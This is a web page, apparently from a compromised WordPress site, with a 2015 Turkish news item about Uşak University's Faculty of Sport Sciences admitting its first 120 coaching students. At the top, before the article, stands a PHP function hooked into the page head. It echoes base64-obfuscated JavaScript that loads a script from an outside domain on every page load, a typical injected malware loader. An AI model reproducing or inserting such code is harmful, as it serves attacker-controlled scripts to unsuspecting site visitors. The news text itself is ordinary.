function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Uşak Üniversitesi Spor Bilimleri Duyuru – Besyo Hakkında Güncel Bilgiler

Uşak Üniversitesi Spor Bilimleri Duyuru

10 Haziran 2015
Genel
2 0

Uşak Üniversitesi Spor Bilimleri Fakültesi Antrenörlük Eğitimi Bölümü’ne 2015-2016 eğitim öğretim yılında ilk defa öğrenci alınacak.

Yükseköğretim Kurulu (YÖK) Uşak Üniversitesi Spor Bilimleri Fakültesi Antrenörlük Eğitimi Bölümü’ne öğrenci alınması teklifini kabul etti. Konuyla ilgili yazılı açıklama yapan Uşak Üniversitesi Rektörü Prof. Dr. Sait Çelik Antrenörlük Eğitimi Bölümü Normal Öğretime 60 ve ikinci öğretimine de 60 öğrenci olmak üzere toplam 120 öğrenci alınacağını söyledi.

Uşak Üniversitesi Spor Bilimleri Fakültesi’nin genç ve dinamik kadrosuyla bölgedeki fakülteler içinde avantajlı bir konumda olduğuna dikkat çeken Rektör Çelik “ Spor Bilimleri Fakültemizde Beden Eğitimi ve Spor Öğretimi, Spor Yöneticiliği, Rekreasyon ve Antrenörlük Eğitimi bölümlerimiz var. Gelecek dönem ilk defa Antrenörlük Eğitimi bölümüne öğrenci alacağız. Öğrencilerimiz için her türlü imkânı sağlamaya çalışıyoruz. Antrenörlük Eğitimi Bölümümüz, spor alanında ihtiyaç duyulan nitelikli antrenörleri yetiştirecektir.”dedi.

4

Bir Cevap Yazın

Menü